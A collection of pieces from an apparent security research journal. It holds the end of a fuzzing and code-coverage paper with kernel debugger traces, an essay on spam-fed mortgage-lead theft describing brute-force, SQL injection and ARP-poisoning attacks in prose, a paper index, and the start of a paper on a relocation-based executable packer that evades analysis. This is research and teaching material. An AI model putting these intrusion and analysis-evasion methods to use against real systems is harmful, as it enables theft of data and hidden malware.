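0034ed70 T:00000001 [bp] f7a8300e 3bc1 cmp eax,ecx"""
print(parse_recorder(sample))
```

Collecting the hit addresses this way makes it straightforward to diff two runs and see which blocks a new test case reached.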
5.5) Analyzing the output
Pedram has developed a set of Python scripts to post-process the .bpl and
recorder output files: adding register metadata to the graph, filtering generated
breakpoint lists, additional GDE support for difficult graphs, combining
multi-function graphs into a conglomerate graph, highlighting interesting
blocks, importing back into the IDA changes made directly to the graph, adding
function offsets to breakpoint addresses and optionally rebasing the recording
addresses, and much more. Pedram provides detailed descriptions and usage of
his Python scripts in the Process Stalking Manual. The scripts used for
formatting the .gml files (for block-based coverage) are psprocessrecording
and psviewrecordingfuncs. The psprocessrecording script is run first on
pluto.sys.0, producing another file called pluto.sys.0.BadFuzz-processed.
psviewrecordingfuncs is then run on the pluto.sys.0.BadFuzz-processed file
to produce BadFuzz.gml, the name chosen for the initial testing technique.
Opening the resulting .gml file lets us view the execution graph.
Executed blocks are shown in pink, unexecuted blocks in grey, executed
paths as green lines, and unexecuted paths as red lines. At this
point it is important to note that the code block starting at address 00011169
does not get executed. This is a problem for our testing process:
fuzzer-supplied data is passed to that block, yet the block is never
reached. Based on this evidence, we can conclude that our testing
methodology needs to be adjusted so that we can hit the unexecuted
block.
Analysis indicates that the device driver does not execute block 00011169
because a comparison is made in the block at address 00011147 which reveals
that [eax] does not match a specified value. Since eax is pointing to the
fuzzer supplied data, we should be able to adjust the fuzzer to meet the
requirement of the 00011161 cmp dword ptr [eax], 0DEADBEEFh instruction, which
will allow us to get into block 00011169. BetterFuzz.exe was improved
to do exactly that.
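The fuzzer adjustment described above can be sketched in a few lines. The payload length is an assumption, and the real BetterFuzz.exe delivers the buffer to the driver with WriteFile; only the leading magic dword comes from the source:

```python
import os
import struct

# The driver's check "cmp dword ptr [eax], 0DEADBEEFh" guards the
# unexecuted block, so every test case must begin with that value.
MAGIC = 0xDEADBEEF

def build_case(payload_len=60):
    """Prepend the magic dword (little-endian), then random bytes."""
    return struct.pack("<I", MAGIC) + os.urandom(payload_len)

case = build_case()
# The comparison against [eax] now succeeds, letting execution fall
# through into block 00011169.
assert struct.unpack_from("<I", case)[0] == MAGIC
```

This is the general pattern for coverage-guided adjustments: keep the random tail, but satisfy each discovered constraint at the front of the buffer.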
5.5.1) Part II
Having determined that the previous testing methodology was not
effective, the test case has been re-engineered and the driver can now
be re-tested to hit the missed block. Following the steps provided
in Part I, the driver is loaded into the Virtual PC, kd is attached to the
driver process, and Debug Stalk has been loaded into kd and has been invoked to
run by using the 'g' command. The entire process is the same except that when
the new fuzz test is invoked, different output is printed to kd:
kd> g
[*] - Recorder Opened......: pluto.sys.0
[*] - Recorder Opened......: pluto.sys-regs.0
Modload: Processing breakpoints for module pluto.sys at f7a27000
Modload: Done. 46 of 46 breakpoints were set.
004047a0 T:00000001 [bp] f7a2b000 a100a0a2f7 mov eax,dword ptr [pluto+0x3000 (f7a2a000)]
004052bc T:00000001 [bp] f7a2b00e 3bc1 cmp eax,ecx
00405339 T:00000001 [bp] f7a2b012 a12890a2f7 mov eax,dword ptr [pluto+0x2028 (f7a29028)]
004053e5 T:00000001 [bp] f7a2b02b e9aed1ffff jmp pluto+0x11de (f7a281de)
00405462 T:00000001 [bp] f7a281de 55 push ebp
004054ee T:00000001 [bp] f7a28219 8b45fc mov eax,dword ptr [ebp-4]
0040558b T:00000001 [bp] f7a28253 6844646b20 push 206B6444h
00405617 T:00000001 [bp] f7a282a2 b980000000 mov ecx,80h
00405694 T:00000001 [bp] f7a282ab 5f pop edi
00406ccc T:00000001 [bp] f7a2806a 8b4c2408 mov ecx,dword ptr [esp+8]
00406e04 T:00000001 [bp] f7a280f6 833d04a0a2f700 cmp dword ptr [pluto+0x3004 (f7a2a004)],0
00406eb0 T:00000001 [bp] f7a2810c 8b7760 mov esi,dword ptr [edi+60h]
00406f4c T:00000001 [bp] f7a28114 8b4704 mov eax,dword ptr [edi+4]
00406ff8 T:00000001 [bp] f7a28122 6a10 push 10h
00407075 T:00000001 [bp] f7a28133 85c0 test eax,eax
00407102 T:00000001 [bp] f7a28147 ff7604 push dword ptr [esi+4]
004071ae T:00000001 [bp] f7a28169 6a04 push 4
current context:
eax=00000003 ebx=00000000 ecx=8050589d edx=0000006a esi=00000000 edi=f1499052
eip=804e3b25 esp=f3cbe720 ebp=f3cbe768 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246
nt!RtlpBreakWithStatusInstruction:
804e3b25 cc int 3
commands:
[m] module list [0-9] enter recorder modes
[x] stop recording [v] toggle verbosity
[q] quit/close
kd> k
ChildEBP RetAddr
f3c1971c 805328e7 nt!RtlpBreakWithStatusInstruction
f3c19768 805333be nt!KiBugCheckDebugBreak+0x19
f3c19b48 805339ae nt!KeBugCheck2+0x574
f3c19b68 805246fb nt!KeBugCheckEx+0x1b
f3c19bb4 804e1ff1 nt!MmAccessFault+0x6f5
f3c19bb4 804da1ee nt!KiTrap0E+0xcc
*** ERROR: Module load completed but symbols could not be loaded for pluto.sys
f3c19c48 f79f0173 nt!memmove+0x72
WARNING: Stack unwind information not available. Following frames may be wrong.
f3c19c84 8057a510 pluto+0x1173
f3c19d38 804df06b nt!NtWriteFile+0x602
f3c19d38 7c90eb94 nt!KiFastCallEntry+0xf8
0006fec0 7c90e9ff ntdll!KiFastSystemCallRet
0006fec4 7c81100e ntdll!ZwWriteFile+0xc
0006ff24 01001276 kernel32!WriteFile+0xf7
0006ff44 010013a7 betterfuzz_c!main+0xa4
0006ffc0 7c816d4f betterfuzz_c!mainCRTStartup+0x12f
0006fff0 00000000 kernel32!BaseProcessStart+0x23
current context:
eax=00000003 ebx=00000000 ecx=8050589d edx=0000006a esi=00000000 edi=f1499052
eip=804e3b25 esp=f3c19720 ebp=f3c19768 iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246
nt!RtlpBreakWithStatusInstruction:
804e3b25 cc int 3
commands:
[m] module list [0-9] enter recorder modes
[x] stop recording [v] toggle verbosity
[q] quit/close
kd> q
[*] - Exiting Stalker
q
C:\Uninformed>
Generating the .gml file allows the tester to view the new execution path. In
this case the block at address 00011169 is executed. All subsequent blocks
underneath it are not executed because the driver BugChecks inside of this
newly hit block, indicating a bug of some sort. The 'k' command in kd produces
the stack unwind information, and we can see that a BugCheck was initiated for an
Access Violation that occurs inside of pluto.sys.
5.6) Part III
Analysis of the graph BadFuzz.gml generated in Part I indicated that the
testing methods used were not effective enough to exhibit optimal code coverage
of the device driver in question. Part II implemented an improved test case
based on the coverage analysis used in Part I. The BetterFuzz.gml graph
allowed testers to verify that the improved testing methods reached the
missed block. This process revealed a fault in block 00011169 which would
have otherwise remained undetected without code coverage analysis.
6) Conclusion and Future Work
This paper illustrated an improved testing technique by taking advantage of
code coverage methods using basic graph theory. The author would like to
reiterate that the driver and fuzz tool used in this paper were simple examples
to illustrate the effectiveness of code coverage practices.
Finally, more research and experimentation are needed to fully develop
these ideas. The question remains how to integrate a full code coverage
analysis tool with a fuzzing tool. Much work has been done on code
coverage techniques and their implementations. For example, the paper
entitled Cryptographic Verification of Test Coverage Claims by Devanbu
et al. presents protocols for coverage testing methods, such as
verifying coverage with and without source code, or with just the
binary, which can utilize both block and branch testing. A tool to
automate the combination of code coverage and fuzzing technologies
needs to be implemented so that the two technologies may
work together without manual investigation. Further research may include more
sophisticated coverage techniques using graph theory such as super blocks,
dominators, and applying weights to frequently used loops, paths and edges.
CFGs may also benefit from Bayesian networks, which are directed acyclic
graphs of nodes representing variables, each with a probability
distribution conditioned on the values of its parents. In other words, Bayesian theory
may be helpful for deterministic prediction of code execution which can in turn
lead to more intelligent fuzzing. In closing, the author extends the hope that
methods and methodologies shared herein can offer other ideas to researchers.
A. References
Devanbu, T (2000). Cryptographic Verification of Test
Coverage Claims. IEEE. 2, 178-192.
Wars Within
9/2006
Orlando Padilla
xbud@g0thead.com
1) Foreword
Abstract: In this paper I will uncover the information exchange of what
may be classified as one of the highest money-making schemes coordinated
by 'organized crime'. I will elaborate on information gathered from a
third party individual directly involved in all aspects of the scheme at
play. I will provide a detailed explanation of this market's origin,
followed by a brief description of some of the actions strategically
performed by these individuals in order to ensure their success.
Finally, I will elaborate on real world examples of how a single person
can be labeled a spammer, malware author, cracker, and an entrepreneur
gone thief. For the purposes of avoiding any legal matters, and
unwanted media, I will refrain from mentioning the names of any
individuals and corporations who are involved in the schemes described
in this paper.
Disclaimer: This document is written with an educational interest and I
cannot be held liable for any outcome of the information released.
Thanks: vax, Shannon and Katelynn
2) Introduction
It is inherently obvious to anyone who owns a computer that the Internet
has changed the world around us in a significant number of ways. From
an uncountable number of careers to a world-wide open market, it
drastically affected everything around us. Don't worry though, I will
not bore you with another ``The future will look like this ... ''
article. For that, I will refer you to a great book by Michio Kaku
called Visions that is remarkably accurate considering it was written in
the mid 90's. But anyway, why am I restating the obvious? To allow
myself to focus on one not so obvious division of an existing market
developed by a corporation that had previously filed for bankruptcy. I
will elaborate on how it "innovated" one particular market and how that
change resulted in a ripple of disaster and greed. The market is real
estate and my focus is on mortgage leads.
The idea of finding, selling and stealing leads is anything but new, in
fact Hollywood made a movie based entirely on the importance of sales
leads titled 'Boiler Room' starring Giovanni Ribisi, Ben Affleck and Vin
Diesel. The movie illustrates a perfect example of the significance of
even one major lead.
I will begin by explaining what mortgage leads are, why they are worth
writing a paper about and how certain individuals have made millions off
of them. I will then discuss the roles of the connected individuals and
how they continue to work when trust is the single point of failure. My
decision to write this article is nothing more than informational, I
have no intentions of ruining the lives of the people who make a living
from what I am about to discuss. In fact, it is to my knowledge not
much of a secret at all but I found it fascinating and wish to share my
experiences with anyone willing to listen.
3) Guidance
As I was growing up, my parents discouraged me from working while
attending school. They made a genuine attempt to provide for me the
support that I needed so that I could focus exclusively on my academics.
Their reasoning for this was simple - Once you start making money,
you'll forget what is important in life and will simply want to follow
this path. As you read through this paper, ask yourself how true this
actually is.
Financial gain drives every market around the world, and quite honestly
there are very few things the world as a whole has not yet done for
money. To quantify what my parents believe, I will describe how the
lives of the people involved vary from the lives they once lived, and
from the lives of a person working a nine-to-five job.
4) The Entity
Mortgage leads, referred to as leads from this point on, are nothing
more than a selective set of criteria consisting of the following:
First Name
Last Name
Phone
City
State
Zip
Email
Loan Type
Loan Amount
Affiliate ID
Domain Ref.
Date
Each lead must contain at least the above criteria with the exception of
perhaps Affiliate ID and Domain Reference to be worth anything to a
buyer. Furthermore, the more reliable a set of leads is, the more it is
worth to a buyer. A buyer, you ask? Well, financing firms are
indirectly involved in this scheme; finance firms take the information
you sold to them, and follow up with the people allegedly interested in
buying, refinancing or applying for a home loan.
4.1) Background
To fully understand who is selling the collected information and to
elaborate on who is buying the information listed above, I'll introduce
hypothetical Corporation A to play the role of the real company. Corp.
A is a mortgage firm in decline: not only are they on the verge of
closing shop, but they have already filed for Chapter 11 bankruptcy and
are out of viable options for recovery. As a last resort they decide to
offer money in exchange for possible loan application candidate leads.
This quickly gained momentum as the Internet was a prime place for
accumulating such information. The plan eventually imploded, but before
diving into what the outcome was, I'll elaborate on how this truly
became its own market.
4.2) Numbers
Initially each collector averaged about 200 leads per sale which drove
just enough profits to keep the company afloat. The term collector in
this paper in its loosest sense is a name given to an individual who
collects mortgage leads for the purpose of attaining a profit. A lead
was first bought at a flat rate of 10 US dollars; at an average of
200 leads per sale, the profit for the collector was a comfortable 2,000 US
dollars. On the flip side of things, Corp. A was successfully
conducting business averaging about 10 sales for every 100 leads they
bought. With these numbers consistently coming through Corp. A made a
profit of about 10,000 US dollars for every successful sale. A little
math illustrates the return on investment ratio:
Investment: 200 x 10 = 2000
Average Profit: 10,000 x 20 = 200,000
Return on Investment: 200,000 - 2,000 = 198,000
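The figures above follow directly from the numbers in the text: 200 leads bought at 10 dollars each, roughly 10 sales per 100 leads (so 20 sales), and about 10,000 dollars of profit per sale. Spelled out:

```python
# Corp. A's return-on-investment arithmetic, restated from the text.
leads = 200
price_per_lead = 10
sales = leads * 10 // 100        # 10 sales per 100 leads -> 20 sales
profit_per_sale = 10_000

investment = leads * price_per_lead   # what Corp. A pays the collector
gross = sales * profit_per_sale       # profit from the resulting sales
roi = gross - investment              # net return

print(investment, gross, roi)
```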
Based on the collection of an insignificant amount of information,
collectors aggressively innovated their collection methods. I will
elaborate on what I mean shortly. For now, I will focus on what happened
immediately after.
New collection methods drove the lead delivery out of control and soon
Corp. A was inundated with so many leads that they had to start turning
them down until they figured out how to process the volume. In order to
handle the number of leads they were now attaining, they decided to
partner with smaller companies and sell them the overflow. Corp. A was
now growing exponentially fast, and in a period of roughly five to six
years, this simple idea drove Corp. A from bankruptcy to a multi-billion
dollar corporation. It is actually rumored that at one point in time
this company consumed 100% of the mortgage leads ever processed in the
United States.
People and greed do not mix very well, and as I mentioned earlier,
collectors and partners wanted more money, so soon other companies began
buying leads from collectors too. I argue that at the time the mortgage
industry was large enough for everyone to profit nicely from it, however
greedy collectors began selling bogus or non-exclusive leads. This
forced mortgage firms to develop a loose classification model for
grading the quality of a lead as an addition to the classification of
the leads themselves.
- Exclusive
An exclusive lead is one that is sold only to one mortgage firm and never again
redistributed. The value of these leads was often higher than non-exclusive, or
as they decided to term them, semi-exclusive leads.
- Semi-Exclusive
Yes, semi-exclusive. I honestly cannot define this, as it is an
oxymoron itself, but someone somewhere (an individual who wishes to
stay anonymous informed me of the terms commonly used) decided to call
non-exclusive leads semi-exclusive to allow them to be resold. It's a
nice euphemism, though.
Grade | Description
--------+-------------
Green | Confirmed Valid Lead
Yellow | Characteristics of a bad lead but enough good to buy
Red | Confirmed Invalid Lead
The reliability of a bulk set is assessed by the person buying them at
the time of sale. The person interested in buying the leads takes a
random set from the bulk he is receiving and personally verifies their
validity. A rating is then given depending on the number of missed
leads he finds. The grading is different with every person you deal
with, but in short a lead is only Green if validated. A validated lead
is one that is confirmed through the person whose information was sold
to begin with (the loan application candidate). A yellow
lead is a lead with all information accurate but the candidate was
either not home or for some reason was not available. Last, a red lead
is a confirmed invalid or bogus lead. A number of things can give away
a bad lead: for example, the Zip code and State not matching, or the
name given being John Doe while the address contains Elm Street, are
probable indications of a bad lead.
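The red-flag checks described above could be sketched as a simple filter. The zip-prefix table here is a tiny illustrative stand-in (real validation needs a full ZIP-to-state database), and the placeholder name/street lists are assumptions:

```python
# Illustrative lead grader based on the red flags described in the text.
ZIP_PREFIX_TO_STATE = {"100": "NY", "900": "CA", "606": "IL"}  # stand-in table
PLACEHOLDER_NAMES = {"john doe", "jane doe"}
PLACEHOLDER_STREETS = {"elm street", "main street"}

def grade(lead):
    """Return 'red' for a confirmed-bogus lead, else 'yellow'.
    (A 'green' grade requires actually contacting the candidate.)"""
    state = ZIP_PREFIX_TO_STATE.get(lead["zip"][:3])
    if state is not None and state != lead["state"]:
        return "red"                       # Zip and State do not match
    name = f"{lead['first']} {lead['last']}".lower()
    if name in PLACEHOLDER_NAMES:
        return "red"                       # obviously fake name
    if any(s in lead["address"].lower() for s in PLACEHOLDER_STREETS):
        return "red"                       # obviously fake address
    return "yellow"

bogus = {"first": "John", "last": "Doe", "zip": "10001",
         "state": "CA", "address": "12 Elm Street"}
print(grade(bogus))
```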
5) The War
Now that I have indulged you with the whereabouts and importance of a
lead, I will discuss how they are obtained. I mentioned above how far an
individual would go as a result of greed. Below I describe their
actions, which outline their (at times) unethical behavior and
persistence to attain more of the goods.
5.1) Self Indulgence
When the collector decides to go a straight route (in terms of their
industry), they can invest some time and money into setting up an
infrastructure to lure potential clients to their web site. They first
need to build a site that resembles a loan agency that allows visitors
to send their applications to them. Once the collector has a website
saving information to a database, he now hires mailers or spammers to
advertise his website. The average return on spam has been extremely
dynamic, and with more advanced filtering mechanisms in place, all a
spammer can hope for is more effective evasion methods. The leads
collected through this method are, on average, valued between eight and
twelve US dollars per lead only because they are exclusive opt-ins. An
opt-in is a user who wishes to receive information regarding the service
or product you provide. (i.e. no one else should have this information
as they obtained it directly from the client). There have been
instances when leads are scarce, however, and opt-ins sold for over
twenty US dollars a lead. Semi-exclusive (or non-exclusive) leads on
the other hand are usually half or less than the price of an exclusive
lead.
The second method of collection is not as trivial as the first one
sounds, although the first is a bit more involved than I actually
described. I will elaborate further on what it takes to successfully
build the infrastructure described above shortly.
5.2) Thievery
Thievery obviously refers to stealing, and to steal, the collector has
to choose from an abundance of targets. Essentially, anyone
constructing an environment to collect leads themselves is a possible
target. Things fall into place fairly easily for a collector wanting to
find more targets -- recall how collectors use mailers as resources to
advertise their websites? This is a pretty viable method for collection;
however, alternative methods do exist, and collectors use any and all
possible enumeration methods they can think of. First, let's dive into
the details of what collectors looking to construct websites need to do
before hiring mailers since this is directly related to the enumeration
of targets.
5.3) Setting up an Infrastructure
So far all this seems pretty straightforward; they set up a webserver to
collect information about the people interested in mortgage loans, and
the mailers responsible for advertising get a sales commission for leads
collected by their spam run (spam: unsolicited e-mail, often of a
commercial nature, sent indiscriminately to multiple mailing lists,
individuals, or newsgroups; junk e-mail). To complete the cycle, the people
interested in loans receive an email which sparks their interest and
they navigate to the link found in the email. Collectors are usually
ambitious and make an eager attempt at keeping their domains, websites,
and mailers going round the clock. In the United States it is illegal
to spam a person without their consent, so websites (the loan forms)
advertised by spam and hosted on a webserver in the US are not too
common, but they do exist. The easiest thing for a collector to do is
to find a hosting provider in a country with no regard for the content
placed on their servers. The technical term for this type of service is
bullet-proof hosting: a bullet-proof host is a node on a provider's
network with extremely loose Terms of Service, often allowing customers
to spam or host any content they wish; usually the provider resides in
a third-world or communist country. The average price for such a
service is about 2,500 US dollars a month. An alternative to dishing out
large amounts of cash for hosting services is using a bot network (a
distributed collection of agents, or bots, connected and controlled by a
central authority). Usually though, bot networks are pretty dynamic and
don't fit the necessary requirements to host this type of content. If a
collector pays a mailer to spam his site for two or three days and the
host goes down the first night (because of an unreliable bot host) a lot
is lost and so generally experienced folks tend to pay for reliable
hosting.
Often, the businesses providing the bullet-proof-hosting servers are
relatively well known, and if they are known so is their allotted IP
space. This, in turn, makes finding servers hosting mortgage
applications a piece of cake. All one has to do is scan a known IP
segment for specific criteria and keep track of those that fit the
profile. Once a worthy target list has been collected, the attacks
follow. An interesting fact about the individuals' involvement in this
industry is that nothing either party is doing is really all that legal.
This, in fact, allows an attacker to launch whatever type of attack he
wants on the victim machine with little to no worry about legal
repercussions. Often a collection machine will have several required
services open to the Internet, for example: http, ssh, ftp, mysql or
mssql and sometimes an administrative web interface. The scope of an
attack is unlimited and the number of man hours invested directly
reflects on the amount of traffic the victim website attracts. It is
even pretty common for certain prowlers to lease a server from the same
segment the victim machine is on simply to increase their odds of
breaching the host. The following briefly describes common attack
practices launched against victim websites.
- Brute-force Enumeration
An attacker will attempt to guess login and password pairs on any, if
not all, of these services. Usually this kind of attack is not too
stealthy, but remember there is little worry - I mean, the victim
cannot simply pick up the phone and call his lawyer, can he?
- SQL Injection
If any of the web interfaces are accessible through the site, SQL
injection attacks are another vector for entry. Although the success
ratio of SQL injection is now relatively low, there is still some
low-hanging fruit to find, and be assured someone greedy and
ambitious enough will find it.
- Classic Attacks
With the massively large number of exploits developed and released to
the public daily, searching and launching attacks is a frequent action.
This sometimes opens up a new market for exploit writers looking to
make some quick cash. Collectors can advertise the need for an exploit
and place a price on a particular application. There are even online
auctions that have been built specifically for this purpose.
- Passive / Passive Aggressive
When an attacker decides to lease a machine on the same segment, it
is usually because they failed to remotely compromise the victim's
machine. As a last resort they can do several things to retrieve
the information they are looking for. The attacker can launch an
ARP poisoning attack and sniff all the incoming traffic to the
victim machine, simply redirect all the client
requests to himself and collect the leads directly, or even wait for
the victim himself to log on and perform a man-in-the-middle attack to
passively collect credentials.
6) More on The Money
In this section, I will associate the roles described above with the
amount of money they can generate. As described earlier, the mailer
serves as the core distributor of an advertising campaign. As a company
would pay a marketing company to advertise its products, a
collector pays a mailer to generate leads (i.e., advertise and generate
revenue). He can also simply take matters into his own hands and
do the dirty work himself. If a mailer is hired, however, there is a
nifty procedure in place to properly track what the mailer collects. Each
mailer is given a unique ID number and the link spammed in each email
contains the ID number. When a client submits information regarding his
loan inquiry, the mailer's ID number is included and the collector now
has record of how many leads a mailer is generating. This method of
tracking referrals is well adopted in most spam/advertising related
industries online. The majority of spyware and adware vendors leverage
this method of tracking to pay their affiliates.
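The referral-tracking scheme described above amounts to embedding the mailer's ID in every spammed link and reading it back on submission. A hedged sketch; the domain and the parameter name are made up for illustration:

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Each mailer's unique ID rides along in the link they spam, so each
# submitted lead can be credited to the mailer who generated it.
def tracking_link(mailer_id, base="http://example-loans.test/apply"):
    return f"{base}?{urlencode({'aff': mailer_id})}"

def credited_mailer(url):
    """Recover the affiliate ID from a submitted tracking link."""
    return parse_qs(urlparse(url).query)["aff"][0]

link = tracking_link("4217")
print(link)
print(credited_mailer(link))
```

The same round trip is what lets spyware and adware vendors pay their affiliates per install or per referral.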
A single spam run can be as large as two million emails. The time
needed to complete a run that big depends on a few key factors - the
method used for distribution and the spam software being used. If a
decent-sized list of proxies is used, you can send an average of about
forty thousand emails per half hour using Dark Mailer. With a little
math we can compute that transmitting two million emails would take
about twenty-five hours. Moreover, if I were to shoot low and say that
.01 percent of two million emails from a single spam run actually
worked, the return for the collector on exclusive leads is about 200
leads per mailer, which at 10 dollars a lead results in about 2,000 USD.
The mailers receive on average about 8 dollars per referral and can
usually track their statistics through a web-based front end showing
their return on time investment in real-time.
7) The Disaster
So far, I've covered in fairly good detail the structure of what was
once a falling corporation taking a 180 degree turn and rising straight
back up to the top. It is too well known though, that what goes up must
come down and twice as fast as it went up.
The core of the problems started when mailers began to falsify the
content of the spam for their collectors. Mailers noticed that the
lower the rate they advertised, the more traffic they would drive to the
collector's website. More traffic meant a higher collection of
leads, which resulted in more money. Whether the mailers were aware of
the laws before they did what they did is unknown to me, but their lies
resulted in lawsuits unfolding from all sides. Unhappy individuals
who had been promised a 1.9 - 2.5 interest rate on a loan began filing
lawsuits against the collectors. This resulted in a fairly large
chain of angry partners. The hierarchy below indicates the ripple of
disaster that came about.
8) Conclusion
It is fair to say that ambition can get the best of people. Indeed,
I'm sure these individuals are trying their best to make a profit out of
this endeavor. Unfortunately, it is not the most appropriate way to
make a living; it does, however, show that their perception is a bit
different. Most of them feel that by staying away from selling drugs
and pornography online, they are not hurting anyone and are simply taking
advantage of a good way to make some money. In retrospect, I agree, but
I refuse to condone spam for any reason; it consumes countless corporate
man-hours and is a general nuisance to anyone who receives email.
A. References
Spammer-X, ``Inside the Spam Cartel.'' http://www.oreilly.com/catalog/1932266860/.
Boiler Room, http://www.imdb.com/title/tt0181984/.
Exploitation Technology
Implementing a Custom X86 Encoder
skape
This paper describes the process of implementing a custom encoder for the x86 architecture. To help set the stage, the McAfee Subscription Manager ActiveX control vulnerability, which was discovered by eEye, will be used as an example of a vulnerability that requires the implementation of a custom encoder. In particular, this vulnerability does not permit the use of uppercase characters. To help make things more interesting, the encoder described in this paper will also avoid all characters above 0x7f. This will make the encoder both UTF-8 safe and tolower safe.
txt | html | pdf
Preventing the Exploitation of SEH Overwrites
skape
This paper proposes a technique that can be used to prevent the exploitation of SEH overwrites on 32-bit Windows applications without requiring any recompilation. While Microsoft has attempted to address this attack vector through changes to the exception dispatcher and through enhanced compiler support, such as with /SAFESEH and /GS, the majority of benefits they offer are limited to image files that have been compiled to make use of the compiler enhancements. This limitation means that without all image files being compiled with these enhancements, it may still be possible to leverage an SEH overwrite to gain code execution. In particular, many third-party applications are still vulnerable to SEH overwrites even on the latest versions of Windows because they have not been recompiled to incorporate these enhancements. To that point, the technique described in this paper does not rely on any compile time support and instead can be applied at runtime to existing applications without any noticeable performance degradation. This technique is also backward compatible with all versions of Windows NT+, thus making it a viable and proactive solution for legacy installations.
txt | html | pdf
Fuzzing
Effective Bug Discovery
vf
Sophisticated methods are currently being developed and implemented for mitigating the risk of exploitable bugs. The process of researching and discovering vulnerabilities in modern code will require changes to accommodate the shift in vulnerability mitigations. Code coverage analysis implemented in conjunction with fuzz testing reveals faults within a binary file that would have otherwise remained undiscovered by either method alone. This paper suggests a research method for more effective runtime binary analysis using the aforementioned strategy. This study presents empirical evidence that despite the fact that bug detection will become increasingly difficult in the future, analysis techniques have an opportunity to evolve intelligently.
code.tgz | txt | html | pdf
General Research
Wars Within
Orlando Padilla
In this paper I will uncover the information exchange of what may be classified as one of the highest money making schemes coordinated by 'organized crime'. I will elaborate on information gathered from a third party individual directly involved in all aspects of the scheme at play. I will provide a detailed explanation of this market's origin, followed by a brief description of some of the actions strategically performed by these individuals in order to ensure their success. Finally, I will elaborate on real world examples of how a single person can be labeled a spammer, malware author, cracker, and an entrepreneur gone thief. For the purposes of avoiding any legal matters, and unwanted media, I will refrain from mentioning the names of any individuals and corporations who are involved in the schemes described in this paper.
txt | html | pdf
Wireless Technology
Fingerprinting 802.11 Implementations via Statistical Analysis of the Duration Field
Johnny Cache
The research presented in this paper provides the reader with a set of algorithms and techniques that enable the user to remotely determine what chipset and device driver an 802.11 device is using. The technique outlined is entirely passive, and given the amount of features that are being considered for inclusion into the 802.11 standard, seems quite likely that it will increase in precision as the standard marches forward. The implications of this are far ranging. On one hand, the techniques can be used to implement innovative new features in Wireless Intrusion Detection Systems (WIDS). On the other, they can be used to target link layer device driver attacks with much higher precision.
code.ref | html | pdf
Locreate: An Anagram for Relocate
skape
12/2006
mmiller@hick.org
1) Foreword
Abstract: This paper presents a proof of concept executable packer
that does not use any custom code to unpack binaries at execution time. This
is different from typical packers which generally rely on packed executables
containing code that is used to perform the inverse of the packing operation
at runtime. Instead of depending on custom code, the technique described in
this paper uses documented behavior of the dynamic loader as a mechanism for
performing the unpacking operation. This difference can make binaries packed
using this technique more difficult to signature and analyze, but only when
presented to an untrained eye. The description of this technique is meant to
be an example of a fun thought exercise and not as some sort of revolutionary
packer. In fact, it's been used in the virus world many years prior to this
paper.
Thanks: The author would like to thank Skywing, spoonm, deft,
intropy, Orlando Padilla, nemo, Richard Johnson, Rolf Rolles, Derek Soeder,
and Andre Protas for their discussions and feedback.
Challenge: Prior to reading this paper, the author recommends that
the reader attempt to determine the behavior of the packer that was used on
the binary included in the attached code sample. The binary itself is
innocuous and just performs a few simple printf operations.
Previous Research: This technique has been used in the virus world far in
advance of this writing. Examples that apply this technique include
W95/Resurrel and W95/Silcer. Further research indicates that Peter Szor did a
write-up on this technique entitled ``Tricky Relocations'' in the April 2001
edition of Virus Bulletin[2,3].
2) Locreate
Executable packers, such as UPX, are commonly employed by malware as a means
of delaying or otherwise thwarting the process of static analysis. Packers
also have perfectly legitimate uses, but these uses fall outside of the scope
of this paper. The reason packers make static analysis more difficult is
because they alter the form of the binary to the point that what appears on
disk is entirely different from what actually ends up executing in memory.
This alteration is typically accomplished by encapsulating a pre-existing
binary in a ``host'' binary. The algorithm used to encapsulate the
pre-existing binary in the host binary is what differs from one packer to the
next. In most cases, the host binary must contain code that will perform the
inverse of the packing operation in order to decapsulate the original binary.
The code that is responsible for performing this operation is typically
referred to as an unpacker. The process of unpacking the original binary is
usually done entirely in memory without writing the original version out to
disk. Once the original binary is unpacked, execution control is transferred
to the original binary which begins executing as if nothing had changed.
This general approach represents an easy way of altering the form of a binary
without changing its effective behavior. In fact, it's pretty much analogous
to payload encoders that are used in conjunction with exploits to alter the
form of a payload in order to satisfy some character restrictions without
changing the payload's effective behavior. In the case of payload encoders,
some arbitrary code must be prefixed to the encoded payload in order to
perform the inverse of the encoding operation once the payload is executed.
However, like payload encoders, the use of custom code to perform the inverse
of the packing or encoding operation can lead to a few problems.
The most apparent of these problems has to do with the fact that while the
packed form of an executable may be entirely different from its original, the
code used to perform the unpacking operation may be static. In the event that
the unpacker consists of static code, either in whole or in part, it may be
possible to signature or otherwise identify that a particular packing
algorithm has been used to produce a binary and thus make it easier to restore
the original form of the binary. This ability is especially important when it
comes to attempting to heuristically identify malware prior to allowing a user
to execute it.
The use of custom code can also make it possible for tools to be developed
that attempt to identify unpackers based on their behavior. Ero Carrera has
provided some excellent illustrations relating to the feasibility of this type
of attack against unpackers[1]. An understanding of an unpacker's behavior may
also make it possible to acquire the original binary without allowing it to
actually execute by simply tracing the unpacker up until the point where it
transfers execution control to the original binary. In the case of malware,
this weakness means that benefits gained from packing an executable can be
completely nullified.
Both of these problems are meant to illustrate that even though custom unpacking
code is often a requirement, its mere presence exposes a potential point of
weakness. If it were possible to eliminate the custom code required to unpack
a binary, it could make the two problems described previously much more difficult
to realize. To that point, the technique described in this paper does not
rely on the presence of custom code in a packed binary in order to unpack
itself. Instead, documented behavior of the dynamic loader is used to perform
the unpacking whenever the packed binary is executed. While this approach has
its benefits, there are a number of problems with it that will be discussed
later on. In the interest of brevity, the packer described in this paper will
simply be referred to as locreate. As was already mentioned,
locreate leverages a documented feature of most dynamic loaders in order to
perform its unpacking operation. Given that the process of unpacking
typically involves transforming the original binary's contents back into its
original form, there are only a finite number of dynamic loader features that
might be abused. Perhaps the feature that is best suited for transforming the
contents of a binary at runtime is the dynamic loader feature that was
designed to do just that: relocations.
In the event that a binary is unable to be loaded at its preferred base
address at runtime, the dynamic loader is responsible for attempting to move
the binary to another location in memory. The act of moving a binary from its
preferred base address to a new base address is more commonly referred to as
relocating. When a binary is relocated to a new base address, any references
the binary might have to addresses that are relative to its preferred base
address will no longer be valid. As such, references that are relative to the
preferred base address must be updated by the dynamic loader in order to make
them relative to the new base address. Of course, this presupposes that the
dynamic loader has some knowledge of where in the binary these address
references are made. To satisfy this presupposition, binaries will typically
include relocation information to provide the dynamic loader with a map to the
locations within the binary that need to be adjusted. When a binary does not
include relocation information, it's classified as a non-relocatable binary.
